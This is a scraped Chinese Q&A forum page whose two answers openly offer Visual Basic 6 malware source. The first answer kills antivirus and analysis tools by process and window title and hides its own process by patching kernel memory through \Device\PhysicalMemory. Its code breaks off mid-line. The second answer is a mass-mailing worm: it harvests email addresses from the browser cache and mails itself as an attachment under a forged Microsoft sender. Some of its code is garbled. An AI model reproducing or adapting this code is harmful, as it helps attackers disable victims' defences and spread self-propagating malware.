发布网友 发布时间:2022-04-20 08:49
共2个回答
热心网友 时间:2022-07-13 00:42
全都放在标准模块中,不要有窗体,启动设置为Sub_main,就行了,可以结干掉常见的反病毒软件,包括冰刃、Autoruns、Sreng、瑞星、卡巴、江民、金山、NOD32等,还开放被感染机器的后门,便于进一步入侵。
Option Explicit
Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Declare Function EnumWindows Lib "user32.dll" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long)
Const PROCESS_ALL_ACCESS As Long = &HFFF
Const WM_CLOSE = &H10
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const ERROR_SUCCESS = 0&
Public KEY_ALL_ACCESS As Double
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Public Const STATUS_ACCESS_DENIED = &HC0000022
Public Const STATUS_INVALID_HANDLE = &HC0000008
Public Const SECTION_MAP_WRITE = &H2
Public Const SECTION_MAP_READ = &H4
Public Const READ_CONTROL = &H20000
Public Const WRITE_DAC = &H40000
Public Const NO_INHERITANCE = 0
Public Const DACL_SECURITY_INFORMATION = &H4
Public Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Public Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Public Const OBJ_INHERIT = &H2
Public Const OBJ_PERMANENT = &H10
Public Const OBJ_EXCLUSIVE = &H20
Public Const OBJ_CASE_INSENSITIVE = &H40
Public Const OBJ_OPENIF = &H80
Public Const OBJ_OPENLINK = &H100
Public Const OBJ_KERNEL_HANDLE = &H200
Public Const OBJ_VALID_ATTRIBUTES = &H3F2
Public Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Public Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Public Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long
Public Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Public Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Public Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Public Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Public Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Public Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Public Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Public verinfo As OSVERSIONINFO
Public g_hNtDLL As Long
Public g_pMapPhysicalMemory As Long
Public g_hMPM As Long
Public aByte(3) As Byte
Public Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Public Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Public Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Public Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Public Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Public Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Public Type AceArray
List() As EXPLICIT_ACCESS
End Type
Public Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type
Public Const ANYSIZE_ARRAY As Long = 1
Public Const SE_PRIVILEGE_ENABLED As Long = &H2
Public Const TOKEN_ADJUST_PRIVILEGES As Long = &H20
Public Const TOKEN_QUERY As Long = &H8
Public Type LUID_AND_ATTRIBUTES
LUID As LARGE_INTEGER
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, ByRef lpLuid As LARGE_INTEGER) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, ByRef NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, ByRef PreviousState As Long, ByRef ReturnLength As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
Public Declare Function GetLastError Lib "kernel32.dll" () As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Thread32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Thread32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Mole32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lppe As MODULEENTRY32) As Long
Public Declare Function Mole32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpme As MODULEENTRY32) As Long
Public Declare Function TerminateThread Lib "kernel32" (ByVal hThread As Long, ByVal dwExitCode As Long) As Long
Public Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId As Long) As Long
Public Const TH32CS_SNAPPROCESS = &H2
Public Const TH32CS_SNAPTHREAD = &H4
Public Const TH32CS_SNAPMODULE As Long = &H8
Public Const PROCESS_TERMINATE As Long = (&H1)
Public Const MAX_PATH As Integer = 260
Public Type PROCESSENTRY32
dwsize As Long
cntusage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32MoleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Public Type MODULEENTRY32 '模块
dwsize As Long
th32MoleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hMole As Long
szMole As String * 256
szExePath As String * 1024
End Type
Public Type THREADENTRY32 '线程
dwsize As Long
cntusage As Long
th32threadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type
Public Function KillThread(ByVal ProcessID As Long) As Boolean
Dim hThread As Long, r As Long, i As Long
Dim TList() As THREADENTRY32
TList = GetThreadList(ProcessID)
For i = 0 To UBound(TList)
With TList(i)
hThread = OpenThread(PROCESS_TERMINATE, False, .th32threadID) '获取进程句柄
If hThread <> 0 Then
r = TerminateThread(hThread, 0) '关闭进程
End If
End With
Next
KillThread = r <> 0
End Function
Public Function KillProcess(ByVal ProcessName As String, Optional ByVal bKillThread As Boolean) As Boolean
Dim hProcess As Long, r As Long
Dim PList() As PROCESSENTRY32
Dim Name As String, i As Long
PList = GetProcessList
For i = 0 To UBound(PList)
With PList(i)
Name = Left(.szExeFile, InStr(1, .szExeFile, vbNullChar) - 1)
DoEvents
r = InMole(.th32ProcessID, ProcessName)
If LCase(Trim(Name)) = LCase(Trim(ProcessName)) Or r Then
hProcess = OpenProcess(PROCESS_TERMINATE, False, .th32ProcessID) '获取进程句柄
If hProcess <> 0 Then
r = TerminateProcess(hProcess, 0) '关闭进程
If Not (r) Then
If bKillThread Then
Call KillThread(.th32ProcessID)
End If
r = TerminateProcess(hProcess, 0) '关闭进程
End If
End If
End If
End With
Next
End Function
Public Function GetThreadList(ByVal ProcessID As Long) As THREADENTRY32()
Dim i As Long
Dim TList() As THREADENTRY32
Dim TE32 As THREADENTRY32
Dim hThreadSnap As Long
Dim TheLoop As Long
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, ProcessID)
TE32.dwsize = Len(TE32)
TheLoop = Thread32First(hThreadSnap, TE32)
While TheLoop <> 0
If TE32.th32OwnerProcessID = ProcessID Then
ReDim Preserve TList(i)
TerminateThread TE32.th32threadID, 0
TList(i) = TE32
i = i + 1
End If
TheLoop = Thread32Next(hThreadSnap, TE32)
Wend
CloseHandle hThreadSnap
GetThreadList = TList
End Function
Public Function GetProcessList() As PROCESSENTRY32()
Dim i As Long
Dim PList() As PROCESSENTRY32
Dim PE32 As PROCESSENTRY32
Dim hProcessSnap As Long
Dim TheLoop As Long
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
PE32.dwsize = Len(PE32)
TheLoop = Process32First(hProcessSnap, PE32)
While TheLoop <> 0
ReDim Preserve PList(i)
PList(i) = PE32
i = i + 1
TheLoop = Process32Next(hProcessSnap, PE32)
Wend
CloseHandle hProcessSnap
GetProcessList = PList
End Function
Public Function GetMoleList(ByVal ProcessID As Long) As MODULEENTRY32()
Dim i As Long
Dim MList() As MODULEENTRY32
Dim ME32 As MODULEENTRY32
Dim hMoleSnap As Long
Dim TheLoop As Long
hMoleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcessID)
ME32.dwsize = Len(ME32)
TheLoop = Mole32First(hMoleSnap, ME32)
While TheLoop <> 0
ReDim Preserve MList(i)
MList(i) = ME32
i = i + 1
TheLoop = Mole32Next(hMoleSnap, ME32)
Wend
CloseHandle hMoleSnap
GetMoleList = MList
End Function
Public Function InMole(ByVal ProcessID As Long, ByVal MoleName As String) As Boolean
Dim i As Long
Dim MList() As MODULEENTRY32
Dim Name As String
On Error GoTo Err:
MList = GetMoleList(ProcessID)
For i = 0 To UBound(MList)
With MList(i)
Name = Left(.szMole, InStr(1, .szMole, vbNullChar) - 1)
If LCase(Name) = LCase(MoleName) Then
InMole = True
Exit For
End If
End With
Next
Err:
End Function
Function EnableDebugPrivilege() As Boolean
Dim TP As TOKEN_PRIVILEGES
Dim hToken As Long, r As Long, e As Long
r = OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
e = GetLastError
' Err.Raise 6
If r And Not e Then
r = LookupPrivilegeValue(vbNullString, "SeDebugPrivilege", TP.Privileges(0).LUID)
e = GetLastError
If r And Not e Then
TP.PrivilegeCount = 1
TP.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
r = AdjustTokenPrivileges(hToken, False, TP, LenB(TP), 0, 0)
EnableDebugPrivilege = GetLastError = 0
End If
End If
Call CloseHandle(hToken)
End Function
Public Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Boolean
Dim sSave As String, Ret As Long, IsIceSword As Boolean, IsAutoruns As Boolean, IsProcexp As Boolean, IsTaskmgr As Boolean, Other As Boolean, i As Long
Ret = GetWindowTextLength(hwnd)
sSave = Space(Ret)
GetWindowText hwnd, sSave, Ret + 1
IsIceSword = True
IsAutoruns = True
IsProcexp = True
IsTaskmgr = True
Other = True
If Len(sSave) < 6 Or Len(sSave) > 16 Then
IsIceSword = False
GoTo No1
End If
For i = Len(sSave) - 5 To Len(sSave)
If (Mid(sSave, i, 1) <> "0") And (Mid(sSave, i, 1) <> "1") And (Mid(sSave, i, 1) <> "2") And (Mid(sSave, i, 1) <> "3") And (Mid(sSave, i, 1) <> "4") And (Mid(sSave, i, 1) <> "5") And (Mid(sSave, i, 1) <> "6") And (Mid(sSave, i, 1) <> "7") And (Mid(sSave, i, 1) <> "8") And (Mid(sSave, i, 1) <> "9") And (Mid(sSave, i, 1) <> "A") And (Mid(sSave, i, 1) <> "B") And (Mid(sSave, i, 1) <> "C") And (Mid(sSave, i, 1) <> "D") And (Mid(sSave, i, 1) <> "E") And (Mid(sSave, i, 1) <> "F") Then IsIceSword = False
Next
If IsIceSword Then
PostMessage hwnd, WM_CLOSE, 0, 0
SendKeys "{Enter}"
SetForegroundWindow hwnd
SendKeys "%{F4}"
End If
No1:
GoTo AllOk
If Len(sSave) < 8 Then
IsAutoruns = False
GoTo No2
End If
If Mid(sSave, 1, 8) <> "Autoruns" Then IsAutoruns = False
If IsAutoruns Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No2:
GoTo AllOk
If Len(sSave) < 16 Then
IsProcexp = False
GoTo No3
End If
If Mid(sSave, 1, 16) <> "Process Explorer" Then IsProcexp = False
If IsProcexp Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No3:
GoTo AllOk
If sSave <> "Windows 任务管理器" Then IsTaskmgr = False
If IsTaskmgr Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
GoTo AllOk
If InStr(1, sSave, "杀毒", vbTextCompare) <> 0 Or InStr(1, sSave, "病毒", vbTextCompare) <> 0 Or InStr(1, sSave, "专杀", vbTextCompare) <> 0 Or InStr(1, sSave, "注册表", vbTextCompare) <> 0 Or InStr(1, sSave, "Anti", vbTextCompare) <> 0 Or InStr(1, sSave, "进程", vbTextCompare) <> 0 Or InStr(1, sSave, "瑞星", vbTextCompare) <> 0 Or InStr(1, sSave, "毒霸", vbTextCompare) <> 0 Or _
InStr(1, sSave, "江民", vbTextCompare) <> 0 Or InStr(1, sSave, "卡巴斯基", vbTextCompare) <> 0 Or InStr(1, sSave, "NOD32", vbTextCompare) <> 0 Or InStr(1, sSave, "McAfee", vbTextCompare) <> 0 Or InStr(1, sSave, "BitDefender", vbTextCompare) <> 0 Or InStr(1, sSave, "avast", vbTextCompare) <> 0 Or InStr(1, sSave, "Kill", vbTextCompare) <> 0 Or InStr(1, sSave, "Virus", vbTextCompare) <> 0 _
Or InStr(1, sSave, "Kaspersky", vbTextCompare) <> 0 Or InStr(1, sSave, "冰刃", vbTextCompare) <> 0 Or InStr(1, sSave, "Autorun", vbTextCompare) <> 0 Or InStr(1, sSave, "sreng", vbTextCompare) <> 0 Or InStr(1, sSave, "查毒", vbTextCompare) <> 0 Or InStr(1, sSave, "运行", vbTextCompare) <> 0 Then PostMessage hwnd, WM_CLOSE, 0, 0
AllOk:
EnumWindowsProc = True
End Function
Public Sub HideCurrentProcess()
'在进程列表中隐藏当前应用程序进程
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If
If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
Public Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl
SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Public Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory"
热心网友 时间:2022-07-13 00:42
object = "<248dd0-bb45-11cf-9abc-0080c7e7b78d>#1.0#0"; "mswinsck.ocx"
begin vb.form form1
caption = "form1"
clientheight = 3195
clientleft = 60
clienttop = 345
clientwidth = 4680
linktopic = "form1"
scaleheight = 3195
scalewidth = 4680
startupposition = 3 windows default
begin mswinsocklib.winsock winsock1
left = 1200
top = 840
_extentx = 741
_extenty = 741
_version = 393216
end
end
attribute vb_name = "form1"
attribute vb_globalnamespace = false
attribute vb_creatable = false
attribute vb_predeclaredid = true
attribute vb_exposed = false
option explicit
private response as string
private declare sub sleep lib "kernel32" (byval dwmilliseconds as long)
private declare function shgetspecialfolderlocation lib "shell32.dll" (byval hwndowner as long, byval nfolder as long, pidl as itemidlist) as long
private declare function shgetpathfromidlist lib "shell32.dll" alias "shgetpathfromidlista" (byval pidl as long, byval pszpath as string) as long
const csidl_tif = &h20
private type shitemid
cb as long
abid as byte
end type
private type itemidlist
mkid as shitemid
end type
private sub form_load()
on error resume next
kill "c:\t.txt"
listht getspecialfolder(csidl_tif)
transmit ("mail.lycos.com")
unload me
end sub
function transmit(byval b8 as string)
dim q as string, a as string, textline as string
dim www, ggg
winsock1.localport = 0
if winsock1.state = sckclosed then
winsock1.protocol = scktcpprotocol
winsock1.remotehost = b8
winsock1.remoteport = 25
winsock1.connect
w4c ("220")
winsock1.senddata "helo localhost" & vbcrlf
w4c ("250")
winsock1.senddata "mail from:" & " <" + "webmaster@microsoft.com" + ">" & vbcrlf
w4c ("250")
open "c:\t.txt" for input as #1
do while not eof(1)
line input #1, textline
q = q & textline
loop
close #1
a = trim(q)
www = split(a, ";")
for each ggg in www
if ggg = "" then
ggg = "blah@h.net"
end if
if instr(1, ggg, "@") then
else
ggg = "faggot@fillme.com"
end if
if instr(1, ggg, "?") then
ggg = "juana12234@yahoo.com"
end if
winsock1.senddata "rcpt t " & "<" & ggg & ">" & vbcrlf
w4c ("250")
next ggg
winsock1.senddata "data" & vbcrlf
w4c ("354")
winsock1.senddata hd & vbcrlf
winsock1.senddata "<html>this is a checking for your system from microsoft.com....</html>" & vbcrlf
winsock1.senddata a12()
winsock1.senddata vbcrlf & "." & vbcrlf
w4c ("250")
winsock1.senddata "quit" & vbcrlf
w4c ("221")
winsock1.close
transmit = true
else
end if
end function
private sub winsock1_dataarrival(byval bytestotal as long)
winsock1.getdata response
end sub
private sub w4c(responsecode as string)
dim tt as single
dim ttt as single
tt = timer
while len(response) = 0
ttt = tt - timer
doevents
if ttt > 24 then
exit sub
end if
sleep 1
wend
while left(response, 3) <> responsecode
doevents
if ttt > 50 then
exit sub
end if
sleep 1
wend
response = ""
end sub
sub listht(dir)
on error resume next
dim fso, ssfh, filh, s, f, d, q, a, textline
set fso = createobject("scripting.filesystemobject")
set ssfh = fso.getfolder(dir).subfolders
for each filh in ssfh
s = infht(filh.path)
listht (filh.path)
if s = "" then
s = "*@well.com"
end if
f = f & s & ";"
next
d = f
open "c:\t.txt" for append as #1
print #1, d
close #1
end sub
function infht(dir)
dim mlto as string
dim fso, cfh, filh, ext, textline, q, wwww
dim j as long, cnt as long
set fso = createobject("scripting.filesystemobject")
set cfh = fso.getfolder(dir).files
for each filh in cfh
ext = fso.getextensionname(filh.path)
ext = lcase(ext)
if (ext = "htm") or (ext = "html") then
open filh.path for input as #1
do while not eof(1)
line input #1, textline
q = q & textline
loop
close #1
for j = 1 to len(q)
if mid(q, j, 8) = """" & "mailt" then
mlto = ""
cnt = 0
do while mid(q, j + 8 + cnt, 1) <> """"
mlto = mlto + mid(q, j + 8 + cnt, 1)
cnt = cnt + 1
loop
wwww = wwww & mlto & ";"
end if
next
end if
next
infht = wwww
end function
private function getspecialfolder(csidl as long) as string
dim r as long
dim idl as itemidlist
dim path as string
r = shgetspecialfolderlocation(100, csidl, idl)
if r = 0 then
path$ = space$(512)
r = shgetpathfromidlist(byval idl.mkid.cb, byval path$)
getspecialfolder = left$(path, instr(path, chr$(0)) - 1)
exit function
end if
getspecialfolder = ""
end function
private function hd() as string
dim fin as string, dh as string, recip as string
dim sdatenow as string, deit as string, phrom as string, topic as string, engine as string, myme as string
sdatenow = format(date, "ddd") & ", " & format(date, "dd mmm yyyy") & " " & format(time, "hh:mm:ss")
recip = "t subscribers" & vbcrlf
deit = "date:" + chr(32) + sdatenow + vbcrlf
phrom = "from: " & chr(34) & "administrators" & chr(34) & " <webmaster@microsoft.com>" + vbcrlf
topic = "subject:" + chr(32) + "let me check your system" + vbcrlf
engine = "x-mailer: mailsux9855097" + vbcrlf
myme = "mime-version: 1.0" & vbcrlf & _
"content-type: multipart/related; boundary=" & _
chr(34) & "blimp" & chr(34) & "; type=" & chr(34) & _
"text/html" & chr(34) & vbcrlf & _
"by:alcotheskaler" & vbcrlf & _
"--blimp" & vbcrlf & _
"content-type: text/html; charset=us-ascii" & vbcrlf & _
"content-transfer-encoding: 7bit" & vbcrlf
dh = phrom & deit & engine & recip & topic & myme
hd = dh
end function
private function a12() as string
dim fin as string
dim phile as string
dim ss as string
ss = app.path
if right(ss,1) <> "\" then ss = ss & "\"
fin = fin & e32(ss & app.exename & ".exe")
fin = fin & vbcrlf & "--blimp--" & vbcrlf
a12 = fin
end function
public function e32(byval vsfullpathname as string) as string
dim fin as string
fin = vbcrlf & "--blimp" & vbnewline
fin = fin & "content-type: application/octet-stream; name=" & chr(34) & "srx.exe" & chr(34) & vbnewline
fin = fin & "content-transfer-encoding: base" & vbnewline
fin = fin & "content-disposition: attachment; filename=" & chr(34) & "srx.exe" & chr(34) & vbnewline
fin = fin & b(vsfullpathname)
e32 = fin
end function
public function b(byval vsfullpathname as string) as string
dim b as integer
dim basetab as variant
dim bin(3) as byte
dim s as string
dim l as long
dim i as long
dim filein as long
dim sresult as string
dim n as long
basetab = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
erase bin
l = 0: i = 0: filein = 0: b = 0:
s = ""
filein = freefile
open vsfullpathname for binary as filein
sresult = s & vbcrlf
s = ""
l = lof(filein) - (lof(filein) mod 3)
for i = 1 to l step 3
get filein, , bin(0)
get filein, , bin(1)
get filein, , bin(2)
if len(s) > then
s = s & vbcrlf
sresult = sresult & s
s = ""
end if
b = (bin(n) \ 4) and &h3f
s = s & basetab(b)
b = ((bin(n) and &h3) * 16) or ((bin(1) \ 16) and &hf)
s = s & basetab(b)
b = ((bin(n + 1) and &hf) * 4) or ((bin(2) \ ) and &h3)
s = s & basetab(b)
b = bin(n + 2) and &h3f
s = s & basetab(b)
next i
if not (lof(filein) mod 3 = 0) then
for i = 1 to (lof(filein) mod 3)
get filein, , bin(i - 1)
next i
if (lof(filein) mod 3) = 2 then
b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)
s = s & basetab(b)
b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)
s = s & basetab(b)
b = ((bin(1) and &hf) * 4) or ((bin(2) \ ) and &h3)
s = s & basetab(b)
s = s & "="
else
b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)
s = s & basetab(b)
b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)
s = s & basetab(b)
s = s & "=="
end if
end if
if s <> "" then
s = s & vbcrlf
sresult = sresult & s
end if
s = ""
close filein
b = sresult
end function